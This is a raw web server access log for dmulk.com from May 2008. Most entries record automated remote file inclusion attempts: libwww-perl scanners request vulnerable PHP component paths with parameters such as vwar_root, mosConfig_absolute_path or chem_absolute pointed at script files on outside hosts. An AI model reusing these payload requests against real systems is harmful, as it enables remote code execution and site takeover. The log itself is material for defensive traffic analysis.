211.115.213.123 - - [04/May/2008:09:00:28 -0700] "GET /logs/access_080312.log//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:28 -0700] "GET //alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:28 -0700] "GET /logs//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:28 -0700] "GET /logs/access_080312.log//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:28 -0700] "GET /logs/access_080312.log//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:29 -0700] "GET //alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:29 -0700] "GET //alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:29 -0700] "GET /logs//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:09:00:32 -0700] "GET /logs//alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:00:41 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:00:41 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:00:41 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:09:01:11 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:09:01:11 -0700] "GET /logs/appserv/main.php?appserv_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:09:01:11 -0700] "GET /appserv/main.php?appserv_root=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:09:01:11 -0700] "GET /appserv/main.php?appserv_root=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:09:01:23 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:01:38 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:01:38 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.21.158 - - [04/May/2008:09:01:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.186 - - [04/May/2008:09:01:56 -0700] "GET /logs/access_080215.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.232.161.40 - - [04/May/2008:09:02:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
203.232.161.40 - - [04/May/2008:09:02:28 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:02:29 -0700] "GET /logs/access_080107.log/inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:02:29 -0700] "GET /inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:09:02:29 -0700] "GET /logs/inc/shows.inc.php?cutepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:09:02:31 -0700] "GET /logs/access.log//display.php?page=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:09:02:32 -0700] "GET //display.php?page=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:03:16 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:03:16 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:03:17 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [04/May/2008:09:03:19 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:03:52 -0700] "GET /logs/access_071218.log//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:03:53 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:03:54 -0700] "GET //index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:03:54 -0700] "GET /logs//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:03:55 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:03:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:03:56 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.117 - - [04/May/2008:09:04:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.117 - - [04/May/2008:09:04:14 -0700] "GET /blog/index.php/2008/04/03/hello-world/feed/ HTTP/1.1" 304 1 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
216.227.217.6 - - [04/May/2008:09:04:14 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:04:19 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:04:33 -0700] "GET /logs/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:04:34 -0700] "GET /!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:04:38 -0700] "GET /logs/access_080315.log//index.php?fn=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:04:38 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:04:39 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:04:39 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:04:44 -0700] "GET /logs/access_071215.log/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:04:44 -0700] "GET /!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:04:45 -0700] "GET /logs/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:04:47 -0700] "GET /logs/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:04:48 -0700] "GET /!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:04:49 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:19 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:19 -0700] "GET /convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:20 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:05:32 -0700] "GET /logs/access_080321.log/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:05:32 -0700] "GET /!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:05:33 -0700] "GET /logs/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:33 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:33 -0700] "GET /convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:34 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:39 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:39 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:40 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:41 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:41 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:41 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:05:44 -0700] "GET /logs/access_080321.log/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:05:44 -0700] "GET /!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:05:44 -0700] "GET /logs/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:05:50 -0700] "GET /logs/access_080105.log/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:05:52 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/priv.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:05:54 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:05:55 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:05:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:05:56 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.58.138.166 - - [04/May/2008:09:05:56 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [04/May/2008:09:05:56 -0700] "GET /logs//include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:05:57 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:05:58 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:05:58 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:09:06:00 -0700] "GET /logs//index.php?fn=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:09:06:02 -0700] "GET /logs/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:09:06:03 -0700] "GET /!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:09:06:04 -0700] "GET //index.php?fn=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:09:06:06 -0700] "GET /logs/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:09:06:06 -0700] "GET /!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:06:09 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:06:13 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:06:13 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:06:13 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:06:14 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:06:17 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.89.198.133 - - [04/May/2008:09:06:21 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [04/May/2008:09:06:22 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:06:24 -0700] "GET /logs/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:06:24 -0700] "GET /!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.138.166 - - [04/May/2008:09:06:29 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:37 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:37 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:37 -0700] "GET /convert/mvcw.php?vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:37 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:37 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:37 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:38 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [04/May/2008:09:06:38 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:06:47 -0700] "GET /logs/access_080118.log/!scanhttp://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.203.209.2 - - [04/May/2008:09:06:52 -0700] "GET /logs/access_080118.log/!scanhttp://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.3.183 - - [04/May/2008:09:07:04 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.84.16.85 - - [04/May/2008:09:07:32 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:07:35 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:07:35 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [04/May/2008:09:07:36 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.52.143.15 - - [04/May/2008:09:07:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
190.54.49.157 - - [04/May/2008:09:07:46 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
190.54.49.157 - - [04/May/2008:09:07:47 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
81.52.143.15 - - [04/May/2008:09:07:51 -0700] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:02 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:02 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:09:08:02 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:08:07 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:08:07 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
121.84.16.85 - - [04/May/2008:09:08:14 -0700] "GET /logs/access_080215.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
